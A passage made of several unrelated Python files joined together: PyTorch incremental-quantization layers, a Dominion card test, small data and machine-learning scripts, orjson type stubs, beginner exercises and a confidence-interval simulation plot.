        return self.module.__getattr__(self.pnameS)

    @property
    def s(self):
        """Scalar quantization scale (NaN until the first inqStep)."""
        return self.sParam.item()

    @s.setter
    def s(self, value):
        self.sParam[0] = value

    @staticmethod
    def inqQuantize(weight, quantLevels):
        """Quantize *weight* element-wise to the closest level in
        *quantLevels* (INQ quantization scheme)."""
        bestQuantLevel = torch.zeros_like(weight)
        minQuantError = torch.full_like(weight, float('inf'))
        for ql in quantLevels:
            qerr = (weight-ql).abs()
            mask = qerr < minQuantError
            bestQuantLevel[mask] = ql
            minQuantError[mask] = qerr[mask]
        return bestQuantLevel

    def inqStep(self, fraction):
        """Advance quantization so that *fraction* of the weights are frozen.

        The level set depends on quantInitMethod; which weights freeze next
        depends on strategy.
        """
        if self.quantInitMethod is None:
            # Classic INQ: power-of-two levels derived from max |w|.
            if self.fraction == 0.0 and math.isnan(self.s):
                self.s = torch.max(torch.abs(self.weight.data)).item()
            n_1 = math.floor(math.log((4*self.s)/3, 2))
            n_2 = int(n_1 + 2 - (self.numLevels // 2))
            if self.numLevels >= 3:
                quantLevelsPos = (2**i for i in range(n_2, n_1+1))
                quantLevelsNeg = (-2**i for i in range(n_2, n_1+1))
                quantLevels = itertools.chain(quantLevelsPos, [0], quantLevelsNeg)
            else:
                assert(self.numLevels == 2)
                quantLevels = [self.s/2, -self.s/2]  # [2**n_2, -2**n_2]
        elif self.quantInitMethod == 'uniform':
            # Uniformly spaced levels over [-s, s].
            if self.fraction == 0.0 and math.isnan(self.s):
                self.s = torch.max(torch.abs(self.weight.data)).item()
            quantLevels = torch.linspace(-self.s, self.s, steps=self.numLevels)
        elif self.quantInitMethod in ['uniform-l1opt',
                                      'uniform-l2opt',
                                      'uniform-perCh-l2opt',
                                      'uniform-linfopt']:
            # Uniform levels with the scale chosen by brute-force norm
            # minimization of the quantization error (requires scipy).
            getQLs = lambda s: torch.linspace(-s, s, steps=self.numLevels)
            if self.fraction == 0.0 and math.isnan(self.s):
                import scipy.optimize

                def optimWeight(weight):
                    def loss(s):
                        s = s.item()
                        qls = getQLs(s)
                        for i, ql in enumerate(qls):
                            tmp = (weight-ql).abs()
                            if i == 0:
                                minQuantErr = tmp
                            else:
                                minQuantErr = torch.min(minQuantErr, tmp)
                        if self.quantInitMethod == 'uniform-l1opt':
                            return minQuantErr.norm(p=1).item()
                        elif self.quantInitMethod in ['uniform-l2opt', 'uniform-perCh-l2opt']:
                            return minQuantErr.norm(p=2).item()
                        elif self.quantInitMethod == 'uniform-linfopt':
                            return minQuantErr.norm(p=float('inf')).item()
                        else:
                            assert(False)
                    bounds = (1e-6, weight.abs().max().item())
                    optRes = scipy.optimize.brute(loss, ranges=(bounds,),
                                                  Ns=1000, disp=True,
                                                  finish=scipy.optimize.fmin)
                    s = optRes[0]
                    # Normalize the weights by the found scale; the level
                    # grid then uses s = 1.
                    weight.mul_(1/s)
                    s = 1
                    return s
                if self.quantInitMethod in ['uniform-l1opt',
                                            'uniform-l2opt',
                                            'uniform-linfopt']:
                    self.s = optimWeight(self.weight.data.flatten().detach())
                elif self.quantInitMethod in ['uniform-perCh-l2opt']:
                    # Per-output-channel rescaling; shared grid with s = 1.
                    self.s = 1
                    for c in range(self.weight.size(0)):
                        optimWeight(self.weight.data[c].flatten().detach())
            quantLevels = getQLs(self.s)
        else:
            assert(False)
        self.fraction = fraction
        if self.strategy == "magnitude-SRQ" or self.strategy == "RPR":
            if self.fraction is None:
                return
            # Quantize everything, then unfreeze a random (1-fraction) subset.
            self.weightFrozen.data.copy_(self.inqQuantize(self.weight.data, quantLevels))
            numUnFreeze = int((1-self.fraction)*self.weight.numel())
            idxsUnFreeze = torch.randperm(self.weight.numel())[:numUnFreeze]
            self.weightFrozen.data.flatten()[idxsUnFreeze] = float('NaN')
        else:
            # Number of weights frozen so far, and the target after this step.
            prevCount = self.weightFrozen.numel() - torch.isnan(self.weightFrozen.data).sum(dtype=torch.long).item()
            newCount = int(self.fraction*self.weightFrozen.numel())
            # Find the indexes of the weights to quantize next.
            if self.strategy == "magnitude":
                # Zero out already-frozen entries so they sort last.
                # Bug fix: boolean indexing returns a *copy*, so the original
                # `weight.data[mask].fill_(0)` was a silent no-op;
                # masked_fill_ modifies the tensor in place.
                self.weight.data.masked_fill_(~torch.isnan(self.weightFrozen.data), 0)
                _, idxsSorted = self.weight.data.flatten().abs().sort(descending=True)
            elif self.strategy == "random":
                idxsSorted = torch.randperm(self.weight.numel())
            else:
                assert(False)
            # Freeze the next (newCount - prevCount) weights at these indexes.
            idxsFreeze = idxsSorted[:newCount-prevCount]
            self.weightFrozen.data.flatten()[idxsFreeze] = self.inqQuantize(self.weight.data.flatten()[idxsFreeze], quantLevels)

    def inqAssembleWeight(self, module=None):
        """Combine frozen (quantized) and full-precision weights.

        With nn.DataParallel the module is copied, so self.module cannot be
        used; the replica must be passed in.
        """
        weight, weightFrozen = self.getWeightParams(module)
        weightFrozen = weightFrozen.detach()
        frozen = ~torch.isnan(weightFrozen)
        weightAssembled = torch.zeros_like(weightFrozen)
        weightAssembled[frozen] = weightFrozen[frozen]
        # NaN entries select the trainable weight (selector is 1.0 there).
        fullPrecSelector = torch.isnan(weightFrozen).float()
        tmp = fullPrecSelector*weight
        weightAssembled = weightAssembled + tmp
        return weightAssembled

    def rescaleWeights(self):
        """Rescale the weights so their mean magnitude equals s/2."""
        self.weight.data.mul_((self.s/2)/self.weight.data.abs().mean().item())
class INQLinear(nn.Linear):
    """Fully-connected layer whose weight is incrementally quantized (INQ)."""
    def __init__(self, in_features, out_features, bias=True,
                 numLevels=3, strategy="magnitude", quantInitMethod=None):
        super().__init__(in_features, out_features, bias)
        # Controller owning the frozen-weight bookkeeping for this layer.
        self.weightInqCtrl = INQParameterController(
            self, 'weight', numLevels, strategy,
            quantInitMethod=quantInitMethod)

    def step(self, fraction):
        """Freeze (quantize) the given fraction of the weights."""
        self.weightInqCtrl.inqStep(fraction)

    def forward(self, input):
        # Mix quantized (frozen) and full-precision weights for this pass.
        w = self.weightInqCtrl.inqAssembleWeight(self)
        return nn.functional.linear(input, w, self.bias)
class INQConv1d(nn.Conv1d):
    """1D convolution whose weight is incrementally quantized (INQ)."""
    def __init__(self, in_channels, out_channels, kernel_size,
                 stride=1, padding=0, dilation=1, groups=1,
                 bias=True, padding_mode='zeros',
                 numLevels=3, strategy="magnitude", quantInitMethod=None):
        super().__init__(in_channels, out_channels, kernel_size,
                         stride, padding, dilation, groups,
                         bias, padding_mode)
        # Controller owning the frozen-weight bookkeeping for this layer.
        self.weightInqCtrl = INQParameterController(
            self, 'weight', numLevels, strategy,
            quantInitMethod=quantInitMethod)

    def step(self, fraction):
        """Freeze (quantize) the given fraction of the weights."""
        self.weightInqCtrl.inqStep(fraction)

    def forward(self, input):
        # Mix quantized (frozen) and full-precision weights for this pass.
        w = self.weightInqCtrl.inqAssembleWeight(self)
        if self.padding_mode == 'circular':
            # Pre-pad circularly, then convolve without implicit padding.
            wrap = ((self.padding[0] + 1) // 2, self.padding[0] // 2)
            wrapped = nn.functional.pad(input, wrap, mode='circular')
            return nn.functional.conv1d(wrapped, w, self.bias, self.stride,
                                        (0,), self.dilation, self.groups)
        return nn.functional.conv1d(input, w, self.bias, self.stride,
                                    self.padding, self.dilation, self.groups)
class INQConv2d(nn.Conv2d):
    """2D convolution whose weight is incrementally quantized (INQ)."""
    def __init__(self, in_channels, out_channels, kernel_size,
                 stride=1, padding=0, dilation=1, groups=1,
                 bias=True, padding_mode='zeros',
                 numLevels=3, strategy="magnitude", quantInitMethod=None):
        super().__init__(in_channels, out_channels, kernel_size,
                         stride, padding, dilation, groups,
                         bias, padding_mode)
        # Controller owning the frozen-weight bookkeeping for this layer.
        self.weightInqCtrl = INQParameterController(
            self, 'weight', numLevels, strategy,
            quantInitMethod=quantInitMethod)

    def step(self, fraction):
        """Freeze (quantize) the given fraction of the weights."""
        self.weightInqCtrl.inqStep(fraction)

    def forward(self, input):
        # Mix quantized (frozen) and full-precision weights for this pass.
        w = self.weightInqCtrl.inqAssembleWeight(self)
        if self.padding_mode == 'circular':
            # Pre-pad circularly (width first, then height), then convolve
            # without implicit padding.
            wrap = ((self.padding[1] + 1) // 2, self.padding[1] // 2,
                    (self.padding[0] + 1) // 2, self.padding[0] // 2)
            wrapped = nn.functional.pad(input, wrap, mode='circular')
            return nn.functional.conv2d(wrapped, w, self.bias, self.stride,
                                        (0,), self.dilation, self.groups)
        return nn.functional.conv2d(input, w, self.bias, self.stride,
                                    self.padding, self.dilation, self.groups)
if __name__ == '__main__':
    # Demo / smoke test: quantize a ramp to power-of-two levels and plot it,
    # then exercise an INQLinear through one RPR step and a backward pass.
    x = torch.linspace(-2,2,100)
    numLevels = 3
    s = torch.max(torch.abs(x)).item()
    # Same power-of-two level construction as INQParameterController.inqStep.
    n_1 = math.floor(math.log((4*s)/3, 2))
    n_2 = int(n_1 + 2 - (numLevels//2))
    quantLevelsPos = (2**i for i in range(n_2, n_1+1))
    quantLevelsNeg = (-2**i for i in range(n_2, n_1+1))
    quantLevels = itertools.chain(quantLevelsPos, [0], quantLevelsNeg)
    x_q = INQParameterController.inqQuantize(x, quantLevels)
    import matplotlib.pyplot as plt
    plt.clf()
    plt.plot(x.numpy())
    plt.plot(x_q.numpy())
    # Small INQ layer: print weights before and after a 50% RPR step.
    model = INQLinear(2, 3, bias=False,
                      numLevels=numLevels, strategy="RPR")
    print(model.weight)
    print(model.weightFrozen)
    model.step(0.5)
    print(model.weight)
    print(model.weightFrozen)
    # Forward + backward to confirm gradients flow through assembly.
    x = torch.randn(4,2)
    y = model(x)
    L = y.norm(p=2)
    L.backward()
|
#!/usr/bin/env python
import unittest
from dominion import Game, Card, Piles
import dominion.Card as Card
###############################################################################
class Card_Fortuneteller(Card.Card):
    """Fortune Teller (Cornucopia): +2 coin attack.

    Each other player reveals cards from the top of their deck until a
    Victory or Curse card appears; that card is top-decked and the rest
    are discarded.
    """
    def __init__(self):
        Card.Card.__init__(self)
        self.cardtype = [Card.CardType.ACTION, Card.CardType.ATTACK]
        self.base = Card.CardExpansion.CORNUCOPIA
        self.desc = """2 Coin. Each other player reveals cards from the top of his deck
until he reveals a Victory or Curse card. He puts it on top and discards the other revealed cards."""
        self.name = "Fortune Teller"
        self.coin = 2
        self.cost = 3

    def special(self, game, player):
        """Make every attack victim dig down to a Victory or Curse card."""
        for plr in player.attack_victims():
            while True:
                card = plr.next_card()
                # Bug fix: stop on an exhausted deck *before* revealing, so
                # we never reveal/inspect a non-card value.
                if not card:
                    break
                plr.reveal_card(card)
                if card.isVictory() or card.name == "Curse":
                    plr.add_card(card, "topdeck")
                    plr.output("%s's Fortune Teller put %s on top of your deck" % (player.name, card.name))
                    break
                plr.output("%s's Fortune Teller discarded your %s" % (player.name, card.name))
                plr.discard_card(card)
###############################################################################
class Test_Fortuneteller(unittest.TestCase):
    """Behavioural tests for the Fortune Teller card."""

    def setUp(self):
        self.g = Game.TestGame(numplayers=2, initcards=["Fortune Teller"])
        self.g.start_game()
        self.plr, self.vic = self.g.player_list()
        self.card = self.g["Fortune Teller"].remove()
        self.plr.add_card(self.card, Piles.HAND)

    def test_play(self):
        """Fortune Teller"""
        # Victim's deck: Duchy buried under Silver and Copper.
        self.vic.piles[Piles.DECK].set("Duchy", "Silver", "Copper")
        self.plr.play_card(self.card)
        # The attacker gains the +2 coin.
        self.assertEqual(self.plr.coins.get(), 2)
        # Non-victory cards are discarded; the Duchy ends up on top.
        self.assertEqual(self.vic.piles[Piles.DECK][-1].name, "Duchy")
        self.assertIn("Silver", self.vic.piles[Piles.DISCARD])
        self.assertIn("Copper", self.vic.piles[Piles.DISCARD])


###############################################################################
if __name__ == "__main__":  # pragma: no cover
    unittest.main()

# EOF
|
import json
import plyvel
def make_db():
    """Create ./db_knock63/ and fill it with artist name -> JSON-encoded tags.

    Records are read line-by-line from 'artist.json'; entries lacking either a
    'name' or a 'tags' field are skipped. If the database already exists the
    function returns immediately without touching it.
    """
    try:
        # error_if_exists=True makes creation fail when the DB is already built.
        db = plyvel.DB('./db_knock63/', create_if_missing=True, error_if_exists=True)
    except plyvel.Error:
        # DB already present (or not creatable) -- nothing to do.
        # bug fix: the old bare `except: pass` also swallowed JSON/IO errors
        # from the load loop below, hiding real failures.
        return
    try:
        # bug fix: the input file handle was never closed.
        with open('artist.json', 'r') as source:
            for line in source:
                artist_dic = json.loads(line)
                if {'name', 'tags'} <= artist_dic.keys():
                    db.put(artist_dic['name'].encode('utf-8'),
                           json.dumps(artist_dic['tags']).encode('utf-8'))
    finally:
        # Close the DB even if a record fails to parse.
        db.close()
def search_tags(name: str) -> str:
    """Look up `name` in the LevelDB and return its tag list, or an
    error message when the artist is not registered."""
    db = plyvel.DB('./db_knock63/')
    raw = db.get(name.encode('utf-8'))
    db.close()
    if raw is None:
        # Missing key: db.get() returned None (the original surfaced this
        # as a TypeError from json.loads).
        return 'The artist name is not registered.'
    return json.loads(raw)
def main():
    """Build the database, then interactively look up artists until 'q'."""
    make_db()
    while True:
        query = input('Please enter an artist name. (quit command: "q")\nartist name: ')
        if query == 'q':
            break
        print(f'tags : {search_tags(query)}')
        print('-' * 100)


if __name__ == '__main__':
    main()
|
import unittest
from gp_framework import report as rep
class TestReportModule(unittest.TestCase):
    """Unit tests for the private helpers in gp_framework.report."""

    def test_transpose_list_of_lists(self):
        rows = [['a', 'b', 'c', 'd', 'e'], ['f', 'g', 'h', 'i', 'j'], ['k', 'l', 'm', 'n', 'o']]
        columns = [['a', 'f', 'k'], ['b', 'g', 'l'], ['c', 'h', 'm'], ['d', 'i', 'n'], ['e', 'j', 'o']]
        self.assertEqual(rep._transpose_list_of_lists(rows), columns)

    def test_combine_list_elements_group_size_2(self):
        # Averages of adjacent pairs of the first ten even numbers.
        evens = [2 * i for i in range(10)]
        self.assertEqual(rep._combine_list_elements(evens, 2), [1, 5, 9, 13, 17])

    def test_combine_list_elements_group_size_3(self):
        # 0..9 in groups of three; the final short group averages to 9.
        values = list(range(10))
        self.assertEqual(rep._combine_list_elements(values, 3), [1, 4, 7, 9])


if __name__ == '__main__':
    unittest.main()
|
import numpy as np
from get_mfc_data import get_mfc_data
from GaussianHMM import GaussianHMM
if __name__ == "__main__":
    # Load per-category MFCC features: {category: [utterance arrays of shape
    # (frames, dims)]} -- shape assumed from Qs[0].shape[1] below, confirm.
    #datas = get_mfc_data('C:/Users/18341/Desktop/book/听觉/实验3-语音识别/语料/features/')
    datas = get_mfc_data('F:/HIT/大三上/视听觉/lab3/组/gzx_sound_mfcc/')
    # Build one HMM per category, initialised via k-means and Viterbi.
    # The last 3 utterances of each category are held out for testing.
    hmms = dict()
    for category in datas:
        Qs = datas[category]
        n_hidden = 5
        n_dim = Qs[0].shape[1]
        hmm = GaussianHMM(n_hidden, n_dim)
        hmm.kmeans_init(Qs[:-3])
        hmm.viterbi_init(Qs)
        hmms[category] = hmm
    # Train each HMM on its training utterances.
    print('start fit')
    for category in hmms:
        hmm = hmms[category]
        Qs = datas[category]
        hmm.fit(Qs[:-3], iter_max = 5)
        hmms[category] = hmm
        print(category, ':fit success')
    # Evaluate: classify each held-out sample by the highest-scoring HMM,
    # printing per-model scores and the final accuracy.
    correct_num = 0
    for real_category in datas:
        for test_sample in datas[real_category][-3:]:
            print('real_category:', real_category)
            max_score = -1 * np.inf
            predict_category = -1
            for test_category in hmms:
                hmm = hmms[test_category]
                score = hmm.generate_prob(test_sample)
                print('test category ', test_category, '\'s score: ', score)
                if score > max_score:
                    max_score = score
                    predict_category = test_category
            if predict_category == real_category:
                correct_num += 1
            print('predict_category:', predict_category)
    # Accuracy over all held-out samples (3 per category).
    # bug fix: the denominator was hard-coded as 3*5, silently assuming
    # exactly five categories; use the actual category count instead.
    print(correct_num / (3 * len(datas)))
|
import gym
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from collections import defaultdict
from collections import Counter
ACTION_HIT = 1
ACTION_STAND = 0
NUM_EPISODES = 500000
def main():
    """Estimate the blackjack state-value function and plot both ace cases."""
    plt.style.use('ggplot')
    env = gym.make('Blackjack-v0')
    values = first_visit_monte_carlo_prediction(env, sample_policy)
    _, axes = plt.subplots(nrows=2, figsize=(5, 8), subplot_kw={'projection': '3d'})
    for axis, label in zip(axes, ('value function with ace as 1',
                                  'value function with ace as 11')):
        axis.set_title(label)
    plot_blackjack(values, axes)
def first_visit_monte_carlo_prediction(env, policy):
    """Estimate V(s) under `policy` by first-visit Monte Carlo sampling.

    Follows Sutton & Barto (2018), Section 5.1: walk each trajectory
    backwards accumulating the return, and record it for a state only on
    that state's first occurrence in the episode. (This differs from the
    incremental V' = V + (r - V)/n variant used in 'Hands-On RL with
    Python' by Sudharsan Ravichandaran.)
    """
    value_table = defaultdict(float)
    returns = defaultdict(list)
    for _ in range(NUM_EPISODES):
        observations, _, rewards = generate_episode(env, policy)
        episode_return = 0
        for step, state in reversed(list(enumerate(observations))):
            episode_return += rewards[step]
            # First-visit check: only record if the state did not occur earlier.
            if state not in observations[:step]:
                returns[state].append(episode_return)
                value_table[state] = np.mean(returns[state])
    return value_table
def generate_episode(env, policy):
    """Roll out one episode of `policy` in `env`.

    Returns three parallel lists (states, actions, rewards) following the
    S_0, A_0, R_1, ... convention: the state *before* each action is kept,
    and the terminal state is never stored.
    """
    trajectory = []  # (state, action, reward) triples
    state = env.reset()
    done = False
    while not done:
        action = policy(state)
        next_state, reward, done, _ = env.step(action)
        trajectory.append((state, action, reward))
        state = next_state
    observations = [s for s, _, _ in trajectory]
    actions = [a for _, a, _ in trajectory]
    rewards = [r for _, _, r in trajectory]
    return observations, actions, rewards
def sample_policy(observation):
    """Fixed evaluation policy: stand on 20 or 21, otherwise hit."""
    score, _dealer_card, _usable_ace = observation
    return ACTION_HIT if score < 20 else ACTION_STAND
def plot_blackjack(value_table, axes):
    """Wireframe-plot the state values on two 3-D axes: axes[0] for no usable
    ace (ace as 1), axes[1] for a usable ace (ace as 11)."""
    player_sums = np.arange(12, 21 + 1)
    dealer_cards = np.arange(1, 10 + 1)
    ace_flags = np.array([False, True])
    values = np.zeros((len(player_sums), len(dealer_cards), len(ace_flags)))
    # Fill the grid; states never visited stay at zero.
    for i, player in enumerate(player_sums):
        for j, dealer in enumerate(dealer_cards):
            for k, ace in enumerate(ace_flags):
                values[i, j, k] = value_table[player, dealer, ace]
    X, Y = np.meshgrid(player_sums, dealer_cards)
    axes[0].plot_wireframe(X, Y, values[:, :, 0])
    axes[1].plot_wireframe(X, Y, values[:, :, 1])
    for axis in axes:
        axis.set_zlim(-1, 1)
        axis.set_ylabel('player sum')
        axis.set_xlabel('dealer showing')
        axis.set_zlabel('state-value')
    plt.show()


if __name__ == "__main__": main()
#!/usr/bin/env python3
# Author: Carlijn Assen
import pickle
import sys
import numpy as np
def tfidf(w1, w2, docs=None):
    """Print a running tf-idf-style score of `w1` and `w2` for every tweet.

    docs -- optional mapping id -> record where record[2] is the tweet text;
            when None, the records are loaded from 'docs.pickle'.

    Scores use the document frequencies accumulated over the tweets seen so
    far; a word absent from a tweet scores 1. Results are printed; the
    function returns None.
    """
    if docs is None:
        with open('docs.pickle', 'rb') as handle:
            docs = pickle.load(handle)
    all_tweets = 0
    # Running document-frequency counts.
    # bug fix: term_in_document was never initialised (NameError on the first
    # tweet containing w1) and term_in_document2 was reset on every iteration.
    term_in_document = 0
    term_in_document2 = 0
    tf_idf_scores = {}
    for item in docs:
        all_tweets += 1
        try:
            words = docs[item][2].split()
        except (KeyError, IndexError):
            print('try another query', file=sys.stderr)
            continue
        tweet_len = len(words)
        if w1 in words:
            term_in_document += 1
            tf = words.count(w1) / tweet_len
            # bug fix: idf = log(N / df-count); the old code divided by the
            # df *ratio*, effectively squaring the N term.
            tf_idf = tf * np.log(all_tweets / term_in_document)
        else:
            tf_idf = 1
        if w2 in words:
            term_in_document2 += 1
            tf2 = words.count(w2) / tweet_len
            tf_idf2 = tf2 * np.log(all_tweets / term_in_document2)
        else:
            tf_idf2 = 1
        tf_idf_scores[all_tweets] = [tf_idf, tf_idf2]
    # bug fix: iterating a dict yields keys only; .items() is needed to
    # unpack (k, v) pairs.
    for k, v in tf_idf_scores.items():
        print(k, v)
# Demo run: tfidf() prints per-tweet scores and returns None, so this also prints "None".
print(tfidf('hallo', 'ik'))
|
# Type stubs for the `orjson` fast JSON library (a compiled extension module).
from collections.abc import Callable
from typing import Any

# Package version string.
__version__: str

# Serialize `__obj` to JSON bytes. `default` is called for otherwise
# unsupported types; `option` is a bitwise OR of the OPT_* flags below.
def dumps(__obj: Any, default: Callable[[Any], Any] | None = ..., option: int | None = ...) -> bytes: ...
# Deserialize JSON from bytes or str.
def loads(__obj: bytes | str) -> Any: ...

class JSONDecodeError(ValueError): ...
class JSONEncodeError(TypeError): ...

# Serialization option flags for dumps() (combine with |).
OPT_APPEND_NEWLINE: int
OPT_INDENT_2: int
OPT_NAIVE_UTC: int
OPT_NON_STR_KEYS: int
OPT_OMIT_MICROSECONDS: int
OPT_PASSTHROUGH_DATACLASS: int
OPT_PASSTHROUGH_DATETIME: int
OPT_PASSTHROUGH_SUBCLASS: int
OPT_SERIALIZE_DATACLASS: int
OPT_SERIALIZE_NUMPY: int
OPT_SERIALIZE_UUID: int
OPT_SORT_KEYS: int
OPT_STRICT_INTEGER: int
OPT_UTC_Z: int
|
def unique_in_order(iterable):
    """Return the elements of `iterable` with consecutive duplicates collapsed.

    Works on strings, lists, and any other iterable (including one-shot
    generators); order is preserved and only immediately repeated elements
    are dropped.
    """
    # Single pass: no materialized copy, no empty-input special case, and no
    # redundant per-iteration index check as in the original loop.
    result = []
    for item in iterable:
        if not result or item != result[-1]:
            result.append(item)
    return result
# Ad-hoc demo calls covering repeats, case sensitivity, lists, and singletons.
print(unique_in_order('AAAABBBCCDAABBB'))
print(unique_in_order('ABBCcADAA'))
print(unique_in_order([1,2,2,3,3]))
print(unique_in_order('A'))
print(unique_in_order('AAA'))
|
class User:
    """A minimal social-network user.

    Attributes:
        name, age, work -- profile fields supplied at construction.
        followers       -- users following this one; starts at 0.
        following       -- users this one follows; starts at 0.
    """

    def __init__(self, name, age, work):
        self.name = name
        self.age = age
        self.work = work
        # Both counters start at zero and are only changed by follow().
        self.followers = 0
        self.following = 0

    def print_user_details(self):
        """Print a one-line profile summary."""
        summary = ("Your name is {}, your age is {} and you are a {} professional. You have {} followers"
                   .format(self.name, self.age, self.work, self.followers))
        print(summary)

    def follow(self, user):
        """Follow `user`: bump their follower count and our following count."""
        user.followers += 1
        self.following += 1
# Demo: create two users, have one follow the other, then print both profiles.
deep = User("Deepanshu", 28, "IT")
rajat = User("Rajat", 26, "Business")
deep.follow(user=rajat)  # rajat gains a follower; deep's following count rises
deep.print_user_details()
rajat.print_user_details()
|
# Pay the minimum monthly payment (4% of the balance) on a credit card for
# 12 months, compounding the remaining balance with monthly interest, and
# report the totals (MIT 6.00-style exercise).
# bug fix: the original used Python 2 `print` statements, which are a
# SyntaxError under Python 3; converted to print() calls.
balance = 4213
annualInterestRate = 0.2
monthlyPaymentRate = 0.04
totalPaid = 0
for num in range(1, 13):  # 12 months
    monthlyPayment = round(balance * monthlyPaymentRate, 2)
    newbalance = round(balance - monthlyPayment, 2)
    # Apply one month's share of the annual interest to the new balance.
    balanceAndinterest = round(newbalance + (annualInterestRate * newbalance) / 12, 2)
    totalPaid += round(monthlyPayment, 2)
    print('Month: ' + str(num))
    print('Minimum monthly payment: ' + str(monthlyPayment))
    print('Remaining balance: ' + str(balanceAndinterest))
    balance = balanceAndinterest
print('Total paid: ' + str(totalPaid))
print('Remaining balance: ' + str(balanceAndinterest))
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 5 10:07:32 2020
@author: dean
"""
import xarray as xr
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
# Load simulated confidence intervals. Indexing below suggests dimensions
# (method, r2er, exp, ci) with ci in {'ll', 'ul'} -- TODO confirm against the
# dataset that produced 'ci_sim_data_m=40.nc'.
ds = xr.open_dataset('ci_sim_data_m=40.nc')
#params = ds['params'].attrs
cis = ds['cis']
r2ers = cis.coords['r2er']
# Clip all CI endpoints into [0, 1] in place.
cis_vals = cis.values
cis_vals[cis_vals>1] = 1
cis_vals[cis_vals<0] = 0
cis[...] = cis_vals
cis = cis[...,:,:]
# Coverage indicator: the CI contains the true r2er and is not degenerate
# (lower limit pinned at 1, or upper limit pinned at 0).
# NOTE(review): (cis.sel(ci='ll')!=1) appears twice -- the second occurrence
# looks like a copy-paste slip (possibly meant for 'ul'); confirm intent.
in_ci = ((cis.sel(ci='ll')<=r2ers)*(cis.sel(ci='ul')>=r2ers)*(cis.sel(ci='ll')!=1)*(cis.sel(ci='ll')!=1)*(cis.sel(ci='ul')!=0))
ms = in_ci.mean('exp')
n_exps = len(in_ci.coords['exp'])
# Binomial standard error of the coverage fraction.
ses = np.sqrt(ms*(1-ms)/n_exps)
s = in_ci.sum('exp')
# Two-sided binomial test of coverage against the nominal 0.8 level.
ps = np.zeros(s.shape)
for i in range(s.shape[0]):
    for j in range(s.shape[1]):
        p = stats.binom_test(s[i,j], n_exps, p=0.8)
        ps[i,j] = p
# Counts of misses above/below the true value (degenerate CIs count as misses).
to_hi = ((cis.sel(ci='ll')>r2ers)+(cis.sel(ci='ll')==1)).sum('exp')
to_lo = ((cis.sel(ci='ul')<r2ers)+(cis.sel(ci='ul')==0)).sum('exp')
# Test whether the misses are split evenly between the two sides.
ps_uneven = np.zeros(s.shape)
for i in range(s.shape[0]):
    for j in range(s.shape[1]):
        p = stats.binom_test([to_hi[i,j], to_lo[i,j]], n_exps, p=0.5)
        ps_uneven[i,j] = p
# Bonferroni-corrected rejection masks at overall alpha = 0.01.
rej = ps<(0.01/(np.product(s.shape)))
rej_uneven = ps_uneven<(0.01/(np.product(s.shape)))
# Plot coverage per CI method, marking significant deviations:
# stars = coverage != 0.8; filled dots = uneven miss sides.
colors = ['c', 'r', 'g', 'orange']
for i in range(4):
    #plt.errorbar(r2ers, ms[:,i], yerr=ses[:,i], color=colors[i])
    plt.errorbar(r2ers, ms[:,i],color=colors[i])
plt.legend(['Non-parametric bootstrap', 'Parametric bootstrap', 'bca','Hybrid bayes'])
for i in range(4):
    plt.scatter(r2ers[rej[:,i]], -0.05 + (ms)[:,i][rej[:,i]], marker='*', edgecolors=colors[i], facecolors='none')
    plt.scatter(r2ers[rej_uneven[:,i]], 0.05+(ms)[:,i][rej_uneven[:,i]], edgecolors=colors[i], facecolors=colors[i])
plt.ylabel('Fraction CI contain true ${r}^2_{ER}$')
plt.xlabel(r'${r}^2_{ER}$')
plt.grid()
plt.tight_layout()
plt.savefig('ci_sim_npbs_pbs_hb_m=40.pdf')
#%%
# Example-simulation figure: lower/upper CI traces for one true r2er value,
# one subplot per CI method (subsampled every `sub_samp` experiments).
plt.figure(figsize=(10,3))
sub_samp = 10
r2er_ind = 3
r2er = r2ers[r2er_ind]
yticks = np.linspace(0,1,5)
plt.subplot(131)
r2_er = r2ers[r2er_ind]
cis[0, r2er_ind, ::sub_samp, 0].plot()
cis[0, r2er_ind, ::sub_samp, 1].plot()
plt.ylim(0,1.1)
plt.plot([0,3000], [r2er,r2er])
plt.ylabel(r'${r}^2_{ER}$')
plt.xlabel('simulation')
plt.legend(['lower CI', 'upper CI', 'True $r^2_{ER}$'])
plt.title('Non parametric\nbootstrap')
plt.gca().set_xticklabels([])
plt.subplot(132)
cis[1, r2er_ind, ::sub_samp, 0].plot()
cis[1, r2er_ind, ::sub_samp, 1].plot()
plt.title('')
plt.ylim(0,1.1)
plt.plot([0,3000], [r2er,r2er])
plt.gca().set_yticklabels([])
plt.gca().set_xticklabels([])
plt.ylabel('')
plt.xlabel('')
plt.title('Parametric\nbootstrap')
plt.subplot(133)
cis[2, r2er_ind, ::sub_samp, 0].plot()
cis[2, r2er_ind, ::sub_samp, 1].plot()
plt.ylim(0,1.1)
plt.plot([0,3000], [r2er,r2er])
plt.gca().set_yticklabels([])
plt.gca().set_xticklabels([])
plt.ylabel('')
plt.xlabel('')
plt.title('Hybrid bayes')
plt.tight_layout()
plt.savefig('ci_sim_npbs_pbs_hb_m=40_example_sim.pdf')
#%%
# Scratch cell: quick look at the hybrid-bayes traces alone.
cis[2, r2er_ind, ::sub_samp, 0].plot()
cis[2, r2er_ind, ::sub_samp, 1].plot()
plt.plot([0,500], [r2er,r2er])
#%%
# Scratch cell: recompute the uneven-miss statistics (duplicate of above).
to_hi = ((cis.sel(ci='ll')>r2ers)+(cis.sel(ci='ll')==1)).sum('exp')
to_lo = ((cis.sel(ci='ul')<r2ers)+(cis.sel(ci='ul')==0)).sum('exp')
ps_uneven = np.zeros(s.shape)
for i in range(s.shape[0]):
    for j in range(s.shape[1]):
        p = stats.binom_test([to_hi[i,j], to_lo[i,j]], n_exps, p=0.5)
        ps_uneven[i,j] = p
#%%
# Scratch cell: coverage with and without excluding degenerate CIs.
in_ci = ((cis.sel(ci='ll')<=r2ers)*(cis.sel(ci='ul')>=r2ers)).mean('exp')
print(in_ci)
in_ci = ((cis.sel(ci='ll')<=r2ers)*(cis.sel(ci='ul')>=r2ers)*(cis.sel(ci='ll')!=1)
         *(cis.sel(ci='ll')!=1)*(cis.sel(ci='ul')!=0)).mean('exp')
print(in_ci)
#%%
# Scratch cell: how often the CIs are degenerate when the true r2er is 0.
print((cis.sel(r2er=0, ci='ul')==0).mean('exp'))
print((cis.sel(r2er=0, ci='ll')>0).mean('exp'))
# Contest scoring: n problems, m submissions "<problem> <verdict>".
# Output: number of solved problems and total penalties (wrong answers
# submitted *before* a problem's first AC; unsolved problems score none).
n, m = map(int, input().split())
submissions = []
for _ in range(m):
